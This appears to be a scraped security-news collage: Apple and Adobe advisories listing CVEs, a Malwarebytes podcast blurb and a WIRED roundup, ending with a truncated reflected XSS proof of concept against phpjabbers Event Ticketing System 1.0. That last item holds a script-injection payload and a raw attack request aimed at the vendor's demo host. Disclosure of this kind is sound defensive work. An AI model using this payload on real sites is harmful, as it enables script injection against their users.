This issue was addressed with improved state management of S/MIME encrypted emails. This issue is fixed in macOS Monterey 12.6.8. A S/MIME encrypted email may be inadvertently sent unencrypted.

Released July 24, 2023

**Accessibility**

Available for: macOS Monterey

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-40442: Nick Brook

Entry added September 8, 2023

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-34425: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

Entry added July 27, 2023

**AppSandbox**

Available for: macOS Monterey

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2023-32364: Gergely Kalman (@gergely\_kalman)

Entry added July 27, 2023

**Assets**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved data protection.

CVE-2023-35983: Mickey Jin (@patch1t)

**CFNetwork**

Available for: macOS Monterey

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-40392: Wojciech Regula of SecuRing (wojciechregula.blog)

Entry added September 8, 2023

**CUPS**

Available for: macOS Monterey

Impact: A user in a privileged network position may be able to leak sensitive information

Description: A logic issue was addressed with improved state management.

CVE-2023-34241: Sei K.

Entry added July 27, 2023

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating curl.

CVE-2023-28319

CVE-2023-28320

CVE-2023-28321

CVE-2023-28322

**Find My**

Available for: macOS Monterey

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

**FontParser**

Available for: macOS Monterey

Impact: Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.

Description: The issue was addressed with improved handling of caches.

CVE-2023-41990: Apple, Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr\_), and Boris Larin (@oct0xor) of Kaspersky

Entry added September 8, 2023

**Grapher**

Available for: macOS Monterey

Impact: Processing a file may lead to unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved checks.

CVE-2023-36854: Bool of YunShangHuaAn(云上华安)

CVE-2023-32418: Bool of YunShangHuaAn(云上华安)

**Kernel**

Available for: macOS Monterey

Impact: A remote user may be able to cause a denial-of-service

Description: The issue was addressed with improved checks.

CVE-2023-38603: Zweig of Kunlun Lab

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-38590: Zweig of Kunlun Lab

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-38598: Mohamed GHANNAM (@\_simo36)

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2023-36495: 香农的三蹦子 of Pangu Lab

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-37285: Arsenii Kostromin (0x3c3e)

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-38604: an anonymous researcher

Entry added July 27, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32381: an anonymous researcher

CVE-2023-32433: Zweig of Kunlun Lab

CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.

Description: This issue was addressed with improved state management.

CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr\_), and Boris Larin (@oct0xor) of Kaspersky

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG Pte. Ltd.

**libxpc**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: A path handling issue was addressed with improved validation.

CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxpc**

Available for: macOS Monterey

Impact: An app may be able to cause a denial-of-service

Description: A logic issue was addressed with improved checks.

CVE-2023-38593: Noah Roskin-Frazee

**Mail**

Available for: macOS Monterey

Impact: A S/MIME encrypted email may be inadvertently sent unencrypted

Description: This issue was addressed with improved state management of S/MIME encrypted emails.

CVE-2023-40440: Taavi Eomäe from Zone Media OÜ

Entry added September 8, 2023

**Music**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved validation of symlinks.

CVE-2023-38571: Gergely Kalman (@gergely\_kalman)

Entry added July 27, 2023

**Model I/O**

Available for: macOS Monterey

Impact: Processing a 3D model may result in disclosure of process memory

Description: The issue was addressed with improved checks.

CVE-2023-38421: Mickey Jin (@patch1t), and Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-38258: Mickey Jin (@patch1t)

Entry updated July 27, 2023

**ncurses**

Available for: macOS Monterey

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2023-29491: Jonathan Bar Or of Microsoft, Emanuele Cozzi of Microsoft, and Michael Pearse of Microsoft

Entry added September 8, 2023

**Net-SNMP**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-38601: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added July 27, 2023

**NSSpellChecker**

Available for: macOS Monterey

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved validation.

CVE-2023-32444: Mickey Jin (@patch1t)

Entry added July 27, 2023

**OpenLDAP**

Available for: macOS Monterey

Impact: A remote user may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-2953: Sandipan Roy

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to access user-sensitive data

Description: A logic issue was addressed with improved restrictions.

CVE-2023-38259: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-38602: Arsenii Kostromin (0x3c3e)

**Shortcuts**

Available for: macOS Monterey

Impact: A shortcut may be able to modify sensitive Shortcuts app settings

Description: An access issue was addressed with improved access restrictions.

CVE-2023-32442: an anonymous researcher

**sips**

Available for: macOS Monterey

Impact: Processing a file may lead to a denial-of-service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32443: David Hoyt of Hoyt LLC

**SQLite**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Regula of SecuRing (wojciechregula.blog)

Entry added September 8, 2023

**SystemMigration**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: The issue was addressed with improved checks.

CVE-2023-32429: Wenchao Li and Xiaolong Bai of Hangzhou Orange Shield Information Technology Co., Ltd.

Entry added July 27, 2023

**Weather**

Available for: macOS Monterey

Impact: An app may be able to determine a user’s current location

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-38605: Adam M.

Entry added September 8, 2023

CVE-2023-40440: About the security content of macOS Monterey 12.6.8

Apple Security Advisory 2023-09-07-3 - watchOS 9.6.2 addresses a malicious attachment vulnerability that could be used to execute arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-09-07-3 watchOS 9.6.2watchOS 9.6.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213907.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.WalletAvailable for: Apple Watch Series 4 and laterImpact: A maliciously crafted attachment may result in arbitrary codeexecution. Apple is aware of a report that this issue may have beenactively exploited.Description: A validation issue was addressed with improved logic.CVE-2023-41061: AppleAdditional recognitionWalletWe would like to acknowledge The Citizen Lab at The University ofTorontoʼs Munk School for their assistance.Instructions on how to update your Apple Watch software are availableat https://support.apple.com/kb/HT204641  To check the version onyour Apple Watch, open the Apple Watch app on your iPhone and select"My Watch > General > About".  Alternatively, on your watch, select"My Watch > General > About".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT6SZcACgkQX+5d1TXaIvpMbhAAvBOZyWF2XNTmRdi+t88bz1M/w8o+OSdOZxgu2AAI8iEiLTJ/HGSEMhNX6NICf1aRUVAidz1Bk3CelRLLnmwgtL+4O/pkU4Q5Diy+vYudbJEZ1VA6Q2W2MmAjJuOr2SD3ygd1TiC38t4DEDe2zQrsXlQ3VuuxnSeVLXWHZaL8gQO3+qr9SLn6gr7iN+MUKYzCjY2DELb+Cbh64gsjtnkHIgzPyq1+SpPMdzIn+PdaokQl/MUA2PiQ/edaiCXO0paN+O6a0rySVAxV0fZ5FUQjYCq5bpOtfuuVu57z/PpytMRY1wQCsQ/AkhP99bXyAFUt+QcjewUx+aI8Fi5NHniEVSuCRY09hEPXxzSHKHO+Pti4tKvKc7SCcxDIRMqTgcf1vah0UpJW0lHiawt5xLPigqq7lhdUBX3QWVKAMWDiJkluOujUh0qPIhdHH48LmOnyPIqseiis1MxyoHMkoM9PYtp5Y5T7t8RWmqo/+TlsXDI3LP8PXrLC1z6oJIXRQBXrOAsUYkuUrg1qOHSterAcpdPcKtgL8kx5Mdh6R1HlkPcS2M5pBnL7QkHhrIT9FBIpUeYwRKvjoqZypjrComClGgGYX7pflWGJUIrXWgqtAJLC2qBq3YiJqnFhhMkhscu7r30pWYe/d3h31In7W0/qkMdMMQE0KunNbWuRtd9ks+w==4Cnz-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-07-3

Apple Security Advisory 2023-09-07-2 - iOS 16.6.1 and iPadOS 16.6.1 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-09-07-2 iOS 16.6.1 and iPadOS 16.6.1iOS 16.6.1 and iPadOS 16.6.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213905.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: Processing a maliciously crafted image may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited.Description: A buffer overflow issue was addressed with improved memoryhandling.CVE-2023-41064: The Citizen Lab at The University of Torontoʼs MunkSchoolWalletAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: A maliciously crafted attachment may result in arbitrary codeexecution. Apple is aware of a report that this issue may have beenactively exploited.Description: A validation issue was addressed with improved logic.CVE-2023-41061: AppleAdditional recognitionWalletWe would like to acknowledge The Citizen Lab at The University ofTorontoʼs Munk School for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.6.1 and iPadOS 16.6.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT6SZYACgkQX+5d1TXaIvraeA//fSiM6KDOD9UTBf00x5765JbeO/dNu3OWSiQtWiUNOE+o936qhvJfg6+qoJQdUtG1E1QyEBLSqnQxeg3Dvm5hUPHEYrfetWR7KaDRqzc9thhEr+2p7XvlMea9nu4dNuT6396+DuHMi3rMGIvMaGlt3iYgVfjKD8TkB0LYpSuKNLTMphOlKefJH6ckR/T0YvHLfT8/9fYX4YHrpjaBSXz1H+ajfsZZxfiQn3wT58+YThxWDlBUCFnae/WTSzklQxc12elPXxdQw43UolpjktIOiiW2mNf1rZ+m21n+w+i2wY8dXoWlI1BUCrGD7hIDG7wFzxec+Dxddq6Qmp1IoqM1p4MijKO7GghZ7enpeBf3FrbRDVzq0rleUDL5QFr1b5fK0ia1TJKNrwwgmonGECXtiufxBZvxXo1RDlbz55KDY3U6G3ytG7ZqybqOTyQDqhH2YbzviJ38DRa3UU7VL1UrLiMpQOR2aigjg8skUaqUlSau0WFqqu8C3h1eMnzhrdih8zWRG9/KRGgP9t8BPykA+3u2ozibK+ncAs00mfMWayjcUPy1wx4nCOGPvNNFd5TJBDl9UoXP3tPIygSLk7V0UzmfZSwN/adPm6/Sxk21uSzD1vsHZ44ohXpNU7f7lRbXzaisXHLWZlH6nQvgImtpHjT+g3HwW/cqgV8Y67wWpds==EWv9-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-07-2

Apple Security Advisory 2023-09-07-1 - macOS Ventura 13.5.2 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-07-1 macOS Ventura 13.5.2

macOS Ventura 13.5.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213906.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Ventura 13.5.2 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT6SZYACgkQX+5d1TXa  
IvrtMhAA1RyQ10AXiFZtsQ98AyilJb114zyas7gNMA64LRqAFXU5stooAnZ553uu  
YSsVUpUCkMGNppha3i/bGUiEMBRpkBugHq288eFJEP6bS/wpL5PKhZKoNl7qcuIv  
nWj9T4x3qq4e6d7TbXSMXVdiSpBSvlsTcxpjk+VcUNcE6bqcgwvswtNWfN2ADCu7  
cwtYDznY3rgaYRSTwfZj/AfS378STrhUDfY55PSuy8Kx4lCwPfADNuLI4CeXZNyc  
Cb7bAd0RJWqrM/LHhq3C/hNxaSQOv4WE3kRbwfeLmYOidhFkZLBryhKkJ/XYTUWi  
WZfHthSPV6gVN8pwrBPslfrWWFS4V/mJMR89TZounTLJbzok7el5H8JNxK6FTymz  
9BIhR9JJKAi58HwGAYMFfrb4HSdUraPKE64qJT6OSEIJLlkDOAFZfmh6C4G0RWcf  
XySsm4w+ABax3YxfzK0IOE9/a8Gib1e0hD+ZnpqcldTvPLiw6ZqqpY4JJbaO8IoT  
5HY03lRMp+eJmw9dVthtzc3p8tUvll/RLe2+anE1ATktdGLJz1Uvosz2+4ee13jx  
nvq5ALYoaqah/XrYXF53eHUfCliGWWbjDE/MrcakfGZ4nqVOy021Id3g5bsb5NlS  
6U4EWi7pAcfqv8TK95YAIDXiSCicKuZsYokYlRL9AAvgerBCw1U=  
=xKgX  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-07-1

Adobe Acrobat Reader versions 2019.021.20056 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader | APSB19-55

**Bulletin ID**

**Date Published**

**Priority**

APSB19-55

December 10, 2019

2

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and  important vulnerabilities.  Successful exploitation could lead to arbitrary code execution in the context of the current user.    

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Download the enterprise installers from ftp://ftp.adobe.com/pub/adobe/, or refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVE Number**

Out-of-Bounds Read  

Information Disclosure  

Important   

CVE-2019-16449  

CVE-2019-16456

CVE-2019-16457

CVE-2019-16458

CVE-2019-16461

CVE-2019-16465

Out-of-Bounds Write 

Arbitrary Code Execution   

Critical

CVE-2019-16450

CVE-2019-16454

Use After Free   

Arbitrary Code Execution     

Critical

CVE-2019-16445

CVE-2019-16448

CVE-2019-16452

CVE-2019-16459

CVE-2019-16464

CVE-2019-16471  

Heap Overflow 

Arbitrary Code Execution     

Critical

CVE-2019-16451

Buffer Error

Arbitrary Code Execution     

Critical

CVE-2019-16462

CVE-2019-16470  

Untrusted Pointer Dereference

Arbitrary Code Execution 

Critical

CVE-2019-16446

CVE-2019-16455

CVE-2019-16460

CVE-2019-16463

Binary Planting (default folder privilege escalation) 

Privilege Escalation

Important 

CVE-2019-16444

Security Bypass

Arbitrary Code Execution

Critical

CVE-2019-16453

Adobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:    

*   Mateusz Jurczyk of Google Project Zero & Anonymous working with Trend Micro Zero Day Initiative (CVE-2019-16451)
*   Honc (章哲瑜) (CVE-2019-16444) 
*   Ke Liu of Tencent Security Xuanwu Lab. (CVE-2019-16445, CVE-2019-16449, CVE-2019-16450, CVE-2019-16454, CVE-2019-16471)
*   Sung Ta (@Mipu94) of SEFCOM Lab, Arizona State University (CVE-2019-16446, CVE-2019-16448) 
*   Aleksandar Nikolic of Cisco Talos (CVE-2019-16463)
*   Technical support team of HTBLA Leonding (CVE-2019-16453) 
*   Haikuo Xie of Baidu Security Lab (CVE-2019-16461)
*   Bit of STAR Labs (CVE-2019-16452) 
*   Xinyu Wan and Yiwei Zhang from Renmin University of China (CVE-2019-16455, CVE-2019-16460, CVE-2019-16462)
*   Bo Qu of Palo Alto Networks and Heige of Knownsec 404 Security Team (CVE-2019-16456) 
*   Zhibin Zhang of Palo Alto Networks (CVE-2019-16457)
*   Qi Deng, Ken Hsu of Palo Alto Networks (CVE-2019-16458) 
*   Lexuan Sun, Hao Cai of Palo Alto Networks (CVE-2019-16459)
*   Yue Guan, Haozhe Zhang of Palo Alto Networks (CVE-2019-16464) 
*   Hui Gao of Palo Alto networks (CVE-2019-16465)
*   Zhibin Zhang, Yue Guan of Palo Alto Networks (CVE-2019-16465)
*   Zhangqing and Zhiyuan Wang from cdsrc of Qihoo 360 (CVE-2019-16470)

March 26, 2020: Added acknowledgement for CVE-2019-16471, CVE-2019-16470

.

CVE-2019-16470: Adobe Security Bulletin

Categories: Podcast
This week on Lock and Code, we revisit an earlier conversation with a Bay Area teenager about the hardest parts about growing up online. 



(Read more...)




The post Re-air: What teenagers face growing up online: Lock and Code S04E19 appeared first on Malwarebytes Labs.

Posted: September 11, 2023 by

_This week on the Lock and Code podcast..._

In 2022, Malwarebytes investigated the blurry, shifting idea of “identity” on the internet, and how online identities are not only shaped by the people behind them, but also inherited by the internet’s youngest users, children. Children have always inherited some of their identities from their parents—consider that two of the largest indicators for political and religious affiliation in the US are, no surprise, the political and religious affiliations of someone’s parents—but the transfer of _online_ identity poses unique risks.  

When parents create email accounts for their kids, do they also teach their children about strong passwords? When parents post photos of their children online, do they also teach their children about the safest ways to post photos of themselves and others? When parents create a Netflix viewing profile on a child's iPad, are they prepared for what else a child might see online? Are parents certain that a kid is ready to _watch_ before they can _walk_?

Those types of questions drove a joint report that Malwarebytes published last year, based on a survey of 2,000 people in North America. That research showed that, broadly, not enough children and teenagers trust their parents to support them online, and not enough parents know exactly how to give the support their children need.

But stats and figures can only tell so much of the story, which is why last year, Lock and Code host David Ruiz spoke with a Bay Area high school graduate about her own thoughts on the difficulties of growing up online. Lock and Code is re-airing that episode this week because, in less than one month, Malwarebytes is releasing a follow-on report about behaviors, beliefs, and blunders in online privacy and cybersecurity. And as part of that follow-on report, Lock and Code is speaking again with the guest brought on last year, Nitya Sharma. 

Before our follow-on report releases, we are sharing with listeners our prior episode that aired in 2022 about the difficulties that an everyday teenager faces online, including managing her time online, trying to meet friends and complete homework, the traps of trading online interaction with in-person socializing, and what she would do differently with her children, if she ever started a family, in preparing them for the Internet.

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Re-air: What teenagers face growing up online: Lock and Code S04E19

Plus: Apple patches newly discovered flaws exploited by NSO Group spyware, North Korean hackers target security researchers, and more.

Last week, WIRED published a deep-dive investigation into Trickbot, the prolific Russian ransomware gang. This week, US and UK authorities sanctioned 11 alleged members of Trickbot and its related group, Conti, including Maksim Galochkin, aka Bentley, one of the alleged members whose real-world identity we confirmed through our investigation. Coincidence? Maybe. Either way, it's a big deal.

In addition to the US and UK sanctions, the US Justice Department also unsealed indictments filed in three US federal courts against Galochkin and eight other alleged Trickbot members for ransomware attacks against entities in Ohio, Tennessee, and California. Because everyone charged is a Russian national, however, it is unlikely they will ever be arrested or face trial.

While Russian cybercriminals typically enjoy immunity, the same may not remain true for the country’s military hackers. The lead prosecutor of the International Criminal Court (ICC) says the ICC will begin pursuing charges for cyber war crimes. The prosecutor, Karim Khan, did not name Russia, but the move follows a formal petition from the Human Rights Center at UC Berkeley’s School of Law asking the ICC to prosecute Russia’s Sandworm hackers for war crimes. Part of Russia’s GRU military intelligence agency, Sandworm is responsible for causing blackouts in Ukraine, the only known instances of cyberattacks shutting down an electrical grid. Sandworm also released the NotPetya malware against Ukraine, which ultimately spread globally and caused an unprecedented $10 billion in damages worldwide.

Russia is far from the only country that engages in offensive cyberwar tactics. China-backed hackers have repeatedly targeted the US and other countries, and they may be getting some help finding unpatched vulnerabilities. A Chinese law passed in 2022 demands that any network technology company operating in the country share details about vulnerabilities in its products with the Chinese government within two days of their discovery. Information about these vulnerabilities may then be shared with China’s hackers. It’s unclear how many Western companies comply with the law or provide enough information to allow Chinese hackers to exploit the products’ flaws.

Speaking of Chinese hackers, Microsoft this week finally explained how China’s state-sponsored hackers managed to steal a cryptographic key that allowed the attackers to successfully access the Outlook email accounts of at least 25 organizations, including US government agencies. According to Microsoft, the hackers broke into the account of a company engineer using token-stealing malware. They then used that account to access a cache of crash data that accidentally contained the signing key they then stole and used to go on an Outlook hacking spree. None of this was supposed to be possible, and Microsoft says it has corrected several flaws in its systems that allowed the attack to happen.

Before he died in a mysterious plane crash last month following an attempted coup against Russian president Vladimir Putin, Yevgeny Prigozhin wasn’t just the leader of the Wagner Group mercenaries. He was also the head of the notorious Internet Research Agency (IRA), a Russian outfit responsible for widespread disinformation campaigns. While the IRA was reportedly shut down, new research shows that pro-Prigozhin trolls continue to push his agenda. Many of the accounts spreading disinformation on X (formerly Twitter) have been banned. But since when has that stopped them?

Elsewhere, we explained how prompt injection attacks against generative AI chatbots like ChatGPT take advantage of a flaw that’s difficult to fix. We detailed how hard it is to opt out of allowing Facebook to use your data to train its AI. We have a rundown on Proton Sentinel, a suite of tools that are similar to Google’s offerings but with a strong emphasis on privacy and security. We also co-published a story with The Markup into Axon’s quest to build Taser-armed drones. And we got the inside scoop on a meeting between top US spies and civil liberties groups over Section 702 of the Foreign Surveillance Intelligence Act, which is set to expire at the end of the year.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Car companies are collecting and selling extremely detailed personal data from drivers who have no real way to opt out, a new report from the Mozilla Foundation found. Researchers spent hundreds of hours studying 25 privacy policies for major car brands and found that none of them met the foundation’s minimum standards around privacy and security.

According to the report, modern cars, stuffed to the roof with sensors, collect more information about you than just about any other product in your life. They know where you go, what you say, and how you move your body. Nissan’s privacy policy, for example, allows the company to collect and share drivers’ sexual activity, health diagnosis data, and genetic information, according to the report.

Eighty-four percent of the brands that researchers studied share or sell this kind of personal data, and only two of them allow drivers to have their data deleted. While it is unclear exactly who these companies share or sell data to, the report points out that there is a huge market for driver data. An automotive data broker called High Mobility cited in the report has a partnership with nine of the car brands Mozilla studied. On its website, it advertises a wide range of data products—including precise location data.

This isn’t just a privacy nightmare but a security one. Volkswagen, Toyota, and Mercedes-Benz have all recently suffered data leaks or breaches that affected millions of customers. According to Mozilla, cars are the worst category of products for privacy that they have ever reviewed.

Apple has just released a security update to iOS after researchers at Citizen Lab discovered a zero-click vulnerability being used to deliver Pegasus spyware. Citizen Lab, which is part of the University of Toronto, is calling the newly discovered exploit chain Blastpass. Researchers say it is capable of compromising iPhones running the latest version of iOS (16.6) without the target even touching their device. According to researchers, Blastpass is delivered to a victim’s phone through an iMessage with an Apple Wallet attachment containing a malicious image.

The Pegasus spyware, developed by NSO Group, enables an attacker to read a target’s text messages, view their photos, and listen to calls. It has been used to track journalists, political dissidents, and human rights activists around the world.

Apple says customers should update their phones to the newly released iOS 16.6.1. The exploit can also attack certain models of iPads. You can see details of the affected models here. Citizen Lab urges at-risk users to enable Lockdown Mode.

North Korea-backed hackers are targeting cybersecurity researchers in a new campaign that is exploiting at least one zero-day vulnerability, Google’s Threat Analysis Group (TAG) warned in a report released Thursday. The group did not provide details about the vulnerability since it is currently unpatched. However, the company says it is part of a popular software package used by security researchers.

According to TAG, the current attack mirrors a January 2021 campaign that similarly targeted security researchers working on vulnerability research and development. Like the previous campaign, North Korean threat actors send researchers malicious files after first spending weeks establishing a relationship with their target. According to the report, the malicious file will execute “a series of anti-virtual machine checks” and send collected information—along with a screenshot—back to the attacker.

In order to shield prospective jurors from harassment, District Attorney Fani Willis asked the judge in Donald Trump’s racketeering trial to prevent people from capturing or distributing any sort of image or identifying information about them. The motion, filed in Fulton County Superior Court on Wednesday, revealed that immediately after the indictment was filed, anonymous individuals on “conspiracy theory websites" had shared the full names, ages, and addresses of 23 grand jurors with “the intent to harass and intimidate them.”

Willis also revealed that she had been the victim of doxxing when the personal information of her and her family—including their physical addresses and “GPS coordinates”—was posted on an unnamed website hosted by a Russian company. Willis, who is Black, had previously disclosed that she faced racist and violent threats after the announcement of her investigation into the former president.

Mozilla: Your New Car Is a Data Privacy Nightmare

Event Ticketing System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Ticketing System-1.0 XSS-Reflected - RCE## Author: nu11secur1ty## Date: 09/08/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `id` request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload }}uypja"><script>alert(1)</script>k36c0 was submitted inthe id parameter. This input was echoed asuypja"><script>alert(1)</script>k36c0 in the application's response.The attacker can use this vulnerability to trick the user intoexecuting - opening the browser on his machine and opening a hazardousURL address.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplmHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google 